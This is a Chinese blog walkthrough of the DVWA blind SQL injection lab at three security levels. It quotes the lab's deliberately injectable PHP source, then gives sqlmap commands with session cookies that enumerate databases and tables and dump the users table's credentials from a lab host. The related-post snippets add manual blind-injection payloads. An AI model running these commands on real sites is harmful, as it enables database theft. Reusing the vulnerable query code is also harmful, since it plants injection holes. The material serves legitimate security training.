DVWA靶场通关(SQL Injection(Blind))

最新推荐文章于 2024-04-05 00:16:33 发布
最新推荐文章于 2024-04-05 00:16:33 发布
阅读量2k 收藏 6
点赞数
分类专栏: DVWA 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56010012/article/details/123637019
版权

SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

LOW

核心代码


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/low.php
<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];
    $exists = false;

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors

            $exists = false;
            if ($result !== false) {
                try {
                    $exists = (mysqli_num_rows( $result ) > 0);
                } catch(Exception $e) {
                    $exists = false;
                }
            }
            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    } else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

}

?>

在这里,直接选用linux中的sqlmap工具进行SQL注入。

(1)列出当前数据库名的命令

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --current-db

红色的位置,针对不同的主机,存在不同的数据。爆出的数据库名为:dvwa

(2) 列出表名的命令行

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa --tables

存在两张表,guestbook和users

 (3)获取users表中的数据

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa -T users --dump --batch

 Medium


SQL Injection Source
vulnerabilities/sqli/source/medium.php
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Display values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

解析 PHP代码,提交方式由get变成了post。

(1)针对提交方式由get===》post,因此需要添加--data命令

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit"

 (2)查看数据库

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -dbs

 (3) 爆出表名

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -tables

 (4)查看表users的columns值

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users -columns

(5)查看具体内容并解密

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users  -C user,password -dump

 

HIGH


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/high.php
<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];
    $exists = false;

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors

            $exists = false;
            if ($result !== false) {
                // Get results
                try {
                    $exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
                } catch(Exception $e) {
                    $exists = false;
                }
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
}

?>

相较于前面两种,这里id 值由cookie 传递,设置了睡眠时间,增加了盲注的时间耗费。

(1)

sqlmap -u"http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-u="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1"

(2)查看数据库

sqlmap -u"http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-u="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -dbs

 

 后续步骤与前两种相同,在字段后面添加必要命令。

BRAVE_YAYA
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场
nidaxin的博客
01-29 2617
1.sql注入一般流程: 1)判断注入点:即判断是否存在sql注入,通常在参数后面加单引号,万能密码 2)判断查询的字段数 :order by 数字(数字从小到大,看是否报错) 3)确定回显位 4)获取信息函数: user() 获取当前用户用户 database() 获取当前数据库 version() 获取数据库版本 5)获取数据库名:1’ union select version(),database()# 6)获取表名: 1‘union select 1,table_name fro
DVWA靶场练习
农夫果园好好喝的博客
05-18 1056
1 SQL 注入 1.1 SQL注入介绍 SQL injection,即SQL注入,攻击者在 WEB 表单或者页面请求的查询字符串中通过注入恶意的 SQL 命令,从而使数据库执行恶意的 SQL 语句 1.2 漏洞出现的场景 此漏洞通常出现在如下场景: WEB表单提交 域名 1.3 注入思路 1.判断是否存在注入,注入类型是字符型、数字型还是搜索性型。 2.猜解 SQL 查询语句中的字段数。 3.确定显示的字段顺序。 4.获取当前的数据库。 5.获取当前数据库中的表 6.获取表中的字段名。 7.查询数据 gr
dvwa靶场通关教程(保姆及教学,一看就会)
最新发布
m0_69043895的博客
04-05 1800
可以看到,Impossible级别的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。让通过验证的情况增加了一种。回到payload,选择第二个爆破点,选择递归模式,recursive grep,设置初始值。看源代码可以发现,不仅限制了文件类型,而且限制了大小,不能少于100kb。可以看到,靶场对文件类型做了限制,只允许上传png、jpeg,并且检查。
DVWA靶场-从搭建到分析系列
shi_li_0823的博客
05-25 315
DVWA靶场-从搭建到分析系列## 标题 DVWA环境搭建到漏洞分析-环境搭建 你好! DVWA是一个渗透测试的演练系统,也就是所谓靶场,可以帮助你快速入门,了解各种简单基础的漏洞原理。 windows版本安装DVWA靶场 安装DVWA环境需求PHP环境,因为DVWA环境是基于PHPweb漏洞和MYSQL漏洞: 这里使用的是phpstudy ,这个软件里面有各种环境,可以按照自己的需求,搭配需要的环境,官网地址:phpstudyhttps://www.xp.cn/。 本文选择是2021年5月phpS
Web安全SQL注入学习之phpstudy下DVWA靶场搭建
LTNSLALALA的博客
06-09 1111
主要记录了Web安全学习中sql注入:phpstudy下dvwa靶场搭建及问题解决过程。
DVWA通过攻略之SQL注入
勿山几已
05-24 6959
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA平台的使用Vulnerability: SQL Injection手工注入
Senimo
03-21 3089
DVWA平台的使用Vulnerability: SQL Injection注入LOWMediumHighImpossible LOW 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先是一个输入框,需要输入User ID的值,尝试输入1: 可以得到正常的回显,包含First name和Surna...
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入
Senimo
03-22 1184
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入LowMediumHighImpossible Low 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先判断原语句的闭合方式,当输入1'时,提示该用户不在数据库中: 可判断原SQL语句闭合方式为id=...
dvwa靶场SQL Injection (Blind)(sql盲注)全难度教程(附代码分析)
m0_73248913的博客
04-05 523
dvwa sql盲注
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 2513
DVWA------SQL Injection (Blind)(SQL盲注)
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3195
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
DVWA下的SQL Injection(Blind)
07-25
盲注
dvwa靶场通关sql injection
07-19
dvwa靶场通关sql injection
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 635
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA靶场练习八—SQL Injection (Blind)
afei001
05-25 331
SQL盲注介绍 一般的SQL注入在输入注入语句时都会返回执行该语句的结果。而SQL盲注就好比在做“判断题”,注入语句的执行结果不会 直接回显出来,而是显示“对”或者“不对”,“存在”或者“不存在”。 低级(Low Level) 方法一:纯手工猜解注入 1.探测注入点 afei 说明存在注入点,并且是SQL盲注。 2.猜解数据库长度 猜解一般使用二分法。 语法: 1' and length(database())>猜...
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5075
BurpSuit官方实验室靶场-SQL注入通关记录。
dvwa靶场通关教程
07-28
当然,下面是一些关于DVWA靶场通关的指南: 1. 获取DVWA:首先,你需要下载和安装DVWA(Damn Vulnerable Web Application)。你可以在官方网站上找到最新版本的下载链接。 2. 配置DVWA:安装完成后,你需要进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值